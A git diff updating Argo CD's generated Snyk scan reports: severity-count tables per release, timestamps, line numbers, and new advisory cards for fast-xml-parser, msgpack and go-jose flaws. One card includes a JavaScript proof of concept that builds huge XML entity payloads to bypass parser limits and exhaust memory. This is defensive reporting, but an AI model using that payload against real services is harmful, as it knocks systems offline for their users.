-| [redis:8.2.3-alpine](v3.3.2/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
-| [argocd:v3.3.2](v3.3.2/quay.io_argoproj_argocd_v3.3.2.html) | 0 | 0 | 9 | 12 |
-| [install.yaml](v3.3.2/argocd-iac-install.html) | - | - | - | - |
-| [namespace-install.yaml](v3.3.2/argocd-iac-namespace-install.html) | - | - | - | - |
+| [gitops-engine/go.mod](v3.4.0-rc2/argocd-test.html) | 0 | 0 | 2 | 0 |
+| [go.mod](v3.4.0-rc2/argocd-test.html) | 1 | 0 | 9 | 0 |
+| [ui/yarn.lock](v3.4.0-rc2/argocd-test.html) | 0 | 6 | 5 | 2 |
+| [dex:v2.45.0](v3.4.0-rc2/ghcr.io_dexidp_dex_v2.45.0.html) | 0 | 1 | 1 | 0 |
+| [haproxy:3.0.8-alpine](v3.4.0-rc2/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
+| [redis:8.2.3-alpine](v3.4.0-rc2/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
+| [argocd:v3.4.0-rc2](v3.4.0-rc2/quay.io_argoproj_argocd_v3.4.0-rc2.html) | 0 | 0 | 6 | 4 |
+| [install.yaml](v3.4.0-rc2/argocd-iac-install.html) | - | - | - | - |
+| [namespace-install.yaml](v3.4.0-rc2/argocd-iac-namespace-install.html) | - | - | - | - |
+
+### v3.3.4
+
+|    | Critical | High | Medium | Low |
+|---:|:--------:|:----:|:------:|:---:|
+| [gitops-engine/go.mod](v3.3.4/argocd-test.html) | 0 | 0 | 2 | 0 |
+| [go.mod](v3.3.4/argocd-test.html) | 1 | 0 | 7 | 0 |
+| [ui/yarn.lock](v3.3.4/argocd-test.html) | 0 | 8 | 7 | 2 |
+| [dex:v2.43.0](v3.3.4/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
+| [haproxy:3.0.8-alpine](v3.3.4/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
+| [redis:8.2.3-alpine](v3.3.4/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
+| [argocd:v3.3.4](v3.3.4/quay.io_argoproj_argocd_v3.3.4.html) | 0 | 0 | 6 | 6 |
+| [install.yaml](v3.3.4/argocd-iac-install.html) | - | - | - | - |
+| [namespace-install.yaml](v3.3.4/argocd-iac-namespace-install.html) | - | - | - | - |

 ### v3.2.7

 |    | Critical | High | Medium | Low |
 |---:|:--------:|:----:|:------:|:---:|
-| [go.mod](v3.2.7/argocd-test.html) | 0 | 1 | 6 | 0 |
-| [ui/yarn.lock](v3.2.7/argocd-test.html) | 0 | 6 | 9 | 2 |
+| [go.mod](v3.2.7/argocd-test.html) | 1 | 1 | 7 | 0 |
+| [ui/yarn.lock](v3.2.7/argocd-test.html) | 0 | 8 | 9 | 2 |
 | [dex:v2.43.0](v3.2.7/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
 | [haproxy:3.0.8-alpine](v3.2.7/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
 | [redis:8.2.2-alpine](v3.2.7/public.ecr.aws_docker_library_redis_8.2.2-alpine.html) | 0 | 1 | 0 | 13 |
@@ -54,11 +68,11 @@ recent minor releases.

 |    | Critical | High | Medium | Low |
 |---:|:--------:|:----:|:------:|:---:|
-| [go.mod](v3.1.12/argocd-test.html) | 0 | 1 | 6 | 0 |
-| [ui/yarn.lock](v3.1.12/argocd-test.html) | 1 | 6 | 9 | 2 |
+| [go.mod](v3.1.12/argocd-test.html) | 1 | 1 | 7 | 0 |
+| [ui/yarn.lock](v3.1.12/argocd-test.html) | 1 | 8 | 9 | 2 |
 | [dex:v2.43.0](v3.1.12/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
 | [haproxy:3.0.8-alpine](v3.1.12/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
 | [redis:7.2.11-alpine](v3.1.12/public.ecr.aws_docker_library_redis_7.2.11-alpine.html) | 0 | 1 | 0 | 11 |
-| [argocd:v3.1.12](v3.1.12/quay.io_argoproj_argocd_v3.1.12.html) | 0 | 0 | 18 | 27 |
+| [argocd:v3.1.12](v3.1.12/quay.io_argoproj_argocd_v3.1.12.html) | 0 | 0 | 22 | 28 |
 | [install.yaml](v3.1.12/argocd-iac-install.html) | - | - | - | - |
 | [namespace-install.yaml](v3.1.12/argocd-iac-namespace-install.html) | - | - | - | - |
--- a/docs/snyk/master/argocd-iac-install.html
+++ b/docs/snyk/master/argocd-iac-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:30:29 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:32:24 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
@@ -881,7 +881,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32104
+                              Line number: 32111
                          </li>
                      </ul>
              
@@ -933,7 +933,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32459
+                              Line number: 32466
                          </li>
                      </ul>
              
@@ -1049,7 +1049,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 31900
+                              Line number: 31901
                          </li>
                      </ul>
              
@@ -1165,7 +1165,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 31962
+                              Line number: 31963
                          </li>
                      </ul>
              
@@ -1223,7 +1223,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32075
+                              Line number: 32082
                          </li>
                      </ul>
              
@@ -1281,7 +1281,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32099
+                              Line number: 32106
                          </li>
                      </ul>
              
@@ -1339,7 +1339,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32459
+                              Line number: 32466
                          </li>
                      </ul>
              
@@ -1397,7 +1397,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32158
+                              Line number: 32165
                          </li>
                      </ul>
              
@@ -1455,7 +1455,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32554
+                              Line number: 32561
                          </li>
                      </ul>
              
@@ -1513,7 +1513,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 33012
+                              Line number: 33025
                          </li>
                      </ul>
              
@@ -1721,7 +1721,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32075
+                              Line number: 32082
                          </li>
                      </ul>
              
@@ -1895,7 +1895,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 31900
+                              Line number: 31901
                          </li>
                      </ul>
              
@@ -1953,7 +1953,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 31962
+                              Line number: 31963
                          </li>
                      </ul>
              
@@ -2011,7 +2011,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32075
+                              Line number: 32082
                          </li>
                      </ul>
              
@@ -2069,7 +2069,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32099
+                              Line number: 32106
                          </li>
                      </ul>
              
@@ -2127,7 +2127,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32459
+                              Line number: 32466
                          </li>
                      </ul>
              
@@ -2185,7 +2185,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32158
+                              Line number: 32165
                          </li>
                      </ul>
              
@@ -2243,7 +2243,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32554
+                              Line number: 32561
                          </li>
                      </ul>
              
@@ -2301,7 +2301,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 33012
+                              Line number: 33025
                          </li>
                      </ul>
              
@@ -2413,7 +2413,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 31908
+                              Line number: 31909
                          </li>
                      </ul>
              
@@ -2469,7 +2469,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 31883
+                              Line number: 31890
                          </li>
                      </ul>
              
@@ -2525,7 +2525,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32007
+                              Line number: 32014
                          </li>
                      </ul>
              
@@ -2581,7 +2581,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32092
+                              Line number: 32099
                          </li>
                      </ul>
              
@@ -2637,7 +2637,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32106
+                              Line number: 32113
                          </li>
                      </ul>
              
@@ -2693,7 +2693,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32467
+                              Line number: 32474
                          </li>
                      </ul>
              
@@ -2749,7 +2749,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32432
+                              Line number: 32439
                          </li>
                      </ul>
              
@@ -2805,7 +2805,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 32911
+                              Line number: 32924
                          </li>
                      </ul>
              
@@ -2861,7 +2861,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 33335
+                              Line number: 33348
                          </li>
                      </ul>
              
--- a/docs/snyk/master/argocd-iac-namespace-install.html
+++ b/docs/snyk/master/argocd-iac-namespace-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:30:39 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:32:34 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
@@ -835,7 +835,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1351
+                              Line number: 1358
                          </li>
                      </ul>
              
@@ -887,7 +887,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1706
+                              Line number: 1713
                          </li>
                      </ul>
              
@@ -1003,7 +1003,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1147
+                              Line number: 1148
                          </li>
                      </ul>
              
@@ -1119,7 +1119,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1209
+                              Line number: 1210
                          </li>
                      </ul>
              
@@ -1177,7 +1177,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1322
+                              Line number: 1329
                          </li>
                      </ul>
              
@@ -1235,7 +1235,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1346
+                              Line number: 1353
                          </li>
                      </ul>
              
@@ -1293,7 +1293,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1706
+                              Line number: 1713
                          </li>
                      </ul>
              
@@ -1351,7 +1351,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1405
+                              Line number: 1412
                          </li>
                      </ul>
              
@@ -1409,7 +1409,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1801
+                              Line number: 1808
                          </li>
                      </ul>
              
@@ -1467,7 +1467,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 2259
+                              Line number: 2272
                          </li>
                      </ul>
              
@@ -1675,7 +1675,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1322
+                              Line number: 1329
                          </li>
                      </ul>
              
@@ -1849,7 +1849,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1147
+                              Line number: 1148
                          </li>
                      </ul>
              
@@ -1907,7 +1907,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1209
+                              Line number: 1210
                          </li>
                      </ul>
              
@@ -1965,7 +1965,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1322
+                              Line number: 1329
                          </li>
                      </ul>
              
@@ -2023,7 +2023,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1346
+                              Line number: 1353
                          </li>
                      </ul>
              
@@ -2081,7 +2081,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1706
+                              Line number: 1713
                          </li>
                      </ul>
              
@@ -2139,7 +2139,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1405
+                              Line number: 1412
                          </li>
                      </ul>
              
@@ -2197,7 +2197,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1801
+                              Line number: 1808
                          </li>
                      </ul>
              
@@ -2255,7 +2255,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 2259
+                              Line number: 2272
                          </li>
                      </ul>
              
@@ -2367,7 +2367,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1155
+                              Line number: 1156
                          </li>
                      </ul>
              
@@ -2423,7 +2423,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1130
+                              Line number: 1137
                          </li>
                      </ul>
              
@@ -2479,7 +2479,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1254
+                              Line number: 1261
                          </li>
                      </ul>
              
@@ -2535,7 +2535,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1339
+                              Line number: 1346
                          </li>
                      </ul>
              
@@ -2591,7 +2591,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1353
+                              Line number: 1360
                          </li>
                      </ul>
              
@@ -2647,7 +2647,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1714
+                              Line number: 1721
                          </li>
                      </ul>
              
@@ -2703,7 +2703,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 1679
+                              Line number: 1686
                          </li>
                      </ul>
              
@@ -2759,7 +2759,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 2158
+                              Line number: 2171
                          </li>
                      </ul>
              
@@ -2815,7 +2815,7 @@
                          </li>
              
                          <li class="card__meta__item">
-                              Line number: 2582
+                              Line number: 2595
                          </li>
                      </ul>
              
--- a/docs/snyk/master/argocd-test.html
+++ b/docs/snyk/master/argocd-test.html
@@ -7,7 +7,7 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
-  <meta name="description" content="19 known vulnerabilities found in 54 vulnerable dependency paths.">
+  <meta name="description" content="24 known vulnerabilities found in 60 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:28:05 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:30:06 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following paths:</span>
@@ -505,9 +505,9 @@
              </div>
    
              <div class="meta-counts">
-                <div class="meta-count"><span>19</span> <span>known vulnerabilities</span></div>
-                <div class="meta-count"><span>54 vulnerable dependency paths</span></div>
-                <div class="meta-count"><span>2902</span> <span>dependencies</span></div>
+                <div class="meta-count"><span>24</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>60 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>2860</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
          </header><!-- .project__header -->
@@ -935,6 +935,225 @@
                <p><a href="https://snyk.io/vuln/SNYK-JS-FASTXMLPARSER-15324289">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
+            <h2 class="card__title">XML Entity Expansion</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--high">
+                        <span class="label__text">high severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Proof of Concept</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: /argo-cd <span class="list-paths__item__arrow">›</span> ui/yarn.lock
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: npm
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            fast-xml-parser
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    argo-cd-ui@1.0.0, redoc@2.4.0 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        argo-cd-ui@1.0.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        redoc@2.4.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        openapi-sampler@1.6.1
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        fast-xml-parser@4.5.3
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p><a href="https://www.npmjs.org/package/fast-xml-parser">fast-xml-parser</a> is a Validate XML, Parse XML, Build XML without C/C++ based libraries</p>
+        <p>Affected versions of this package are vulnerable to XML Entity Expansion in the <code>replaceEntitiesValue()</code> function, which doesn&#39;t protect unlimited expansion of numeric entities the way it does DOCTYPE data (as described and fixed for <a href="https://security.snyk.io/vuln/SNYK-JS-FASTXMLPARSER-15307668">CVE-2026-26278</a>). An attacker can exhaust system memory and CPU resources by submitting XML input containing a large number of numeric character references - <code>&amp;#NNN;</code> and <code>&amp;#xHH;</code>.</p>
+        <p><strong>Note:</strong> This is a bypass for the fix to the DOCTYPE expansion vulnerability in 5.3.6.</p>
+        <h2 id="details">Details</h2>
+        <p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p>
+        <p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p>
+        <p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p>
+        <p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p>
+        <p>Two common types of DoS vulnerabilities:</p>
+        <ul>
+        <li><p>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082">commons-fileupload:commons-fileupload</a>.</p>
+        </li>
+        <li><p>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108">npm <code>ws</code> package</a></p>
+        </li>
+        </ul>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>fast-xml-parser</code> to version 5.5.6 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01">GitHub Commit</a></li>
+        <li><a href="https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6">GitHub Release</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-JS-FASTXMLPARSER-15677840">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
+            <h2 class="card__title">Improper Validation of Specified Quantity in Input</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--high">
+                        <span class="label__text">high severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Proof of Concept</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: /argo-cd <span class="list-paths__item__arrow">›</span> ui/yarn.lock
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: npm
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            fast-xml-parser
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    argo-cd-ui@1.0.0, redoc@2.4.0 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        argo-cd-ui@1.0.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        redoc@2.4.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        openapi-sampler@1.6.1
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        fast-xml-parser@4.5.3
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p><a href="https://www.npmjs.org/package/fast-xml-parser">fast-xml-parser</a> is a Validate XML, Parse XML, Build XML without C/C++ based libraries</p>
+        <p>Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input in the <code>DocTypeReader</code> component when the <code>maxEntityCount</code> or <code>maxEntitySize</code> configuration options are explicitly set to 0. Due to JavaScript&#39;s falsy evaluation, the intended limits are bypassed. An attacker can cause unbounded entity expansion and exhaust server memory by supplying crafted XML input containing numerous large entities.</p>
+        <p><strong>Note:</strong></p>
+        <p>This is only exploitable if the application is configured with <code>processEntities</code> enabled and either <code>maxEntityCount</code> or <code>maxEntitySize</code> set to 0.</p>
+        <h2 id="poc">PoC</h2>
+        <pre><code class="language-js">const { XMLParser } = require(&quot;fast-xml-parser&quot;);
+        
+        // Developer intends: &quot;no entities allowed at all&quot;
+        const parser = new XMLParser({
+          processEntities: {
+            enabled: true,
+            maxEntityCount: 0,    // should mean &quot;zero entities allowed&quot;
+            maxEntitySize: 0       // should mean &quot;zero-length entities only&quot;
+          }
+        });
+        
+        // Generate XML with many large entities
+        let entities = &quot;&quot;;
+        for (let i = 0; i &lt; 1000; i++) {
+          entities += `&lt;!ENTITY e${i} &quot;${&quot;A&quot;.repeat(100000)}&quot;&gt;`;
+        }
+        
+        const xml = `&lt;?xml version=&quot;1.0&quot;?&gt;
+        &lt;!DOCTYPE foo [
+          ${entities}
+        ]&gt;
+        &lt;foo&gt;&amp;e0;&lt;/foo&gt;`;
+        
+        // This should throw &quot;Entity count exceeds maximum&quot; but does not
+        try {
+          const result = parser.parse(xml);
+          console.log(&quot;VULNERABLE: parsed without error, entities bypassed limits&quot;);
+        } catch (e) {
+          console.log(&quot;SAFE:&quot;, e.message);
+        }
+        
+        // Control test: setting maxEntityCount to 1 correctly blocks
+        const safeParser = new XMLParser({
+          processEntities: {
+            enabled: true,
+            maxEntityCount: 1,
+            maxEntitySize: 100
+          }
+        });
+        
+        try {
+          safeParser.parse(xml);
+          console.log(&quot;ERROR: should have thrown&quot;);
+        } catch (e) {
+          console.log(&quot;CONTROL:&quot;, e.message);  // &quot;Entity count (2) exceeds maximum allowed (1)&quot;
+        }
+        </code></pre>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>fast-xml-parser</code> to version 5.5.7 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g">GitHub Advisory</a></li>
+        <li><a href="https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-JS-FASTXMLPARSER-15699647">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">Inefficient Algorithmic Complexity</h2>
@@ -1345,6 +1564,92 @@
                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOLANGORGXNETHTML-15237740">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">Improper Validation of Specified Type of Input</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: /argo-cd/argoproj/argo-cd/v3 <span class="list-paths__item__arrow">›</span> go.mod
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/vmihailenco/msgpack/v5
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    github.com/argoproj/argo-cd/v3@0.0.0, github.com/go-redis/cache/v9@9.0.0 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@0.0.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/go-redis/cache/v9@9.0.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/vmihailenco/msgpack/v5@5.4.1
+                                        
+                                </span>
+        
+                            </li>
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@0.0.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/r3labs/diff/v3@3.0.2
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/vmihailenco/msgpack/v5@5.4.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the calls plugin when handling websocket messages containing malformed msgpack frames. An attacker can cause the server to consume excessive memory and crash by sending specially crafted websocket requests.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>There is no fixed version for <code>github.com/vmihailenco/msgpack/v5</code>.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/mattermost/msgpack/commit/2f9c67d7e57f">GitHub Commit</a></li>
+        <li><a href="https://mattermost.com/security-updates">Mattermost Security Updates</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMVMIHAILENCOMSGPACKV5-15702238">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">MPL-2.0 license</h2>
@@ -1925,6 +2230,159 @@
                <p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:gosimple:slug:MPL-2.0">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">Improper Handling of Highly Compressed Data (Data Amplification)</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: /argo-cd/argoproj/argo-cd/v3 <span class="list-paths__item__arrow">›</span> go.mod
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/go-jose/go-jose/v3
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    github.com/argoproj/argo-cd/v3@0.0.0, github.com/oauth2-proxy/mockoidc@#caebfff84d25 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@0.0.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/oauth2-proxy/mockoidc@#caebfff84d25
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/go-jose/go-jose/v3@3.0.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification). An attacker could send a JWE containing compressed data that, when decompressed by <code>Decrypt</code> or <code>DecryptMulti</code>, would use large amounts of memory and CPU.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>github.com/go-jose/go-jose/v3</code> to version 3.0.3 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
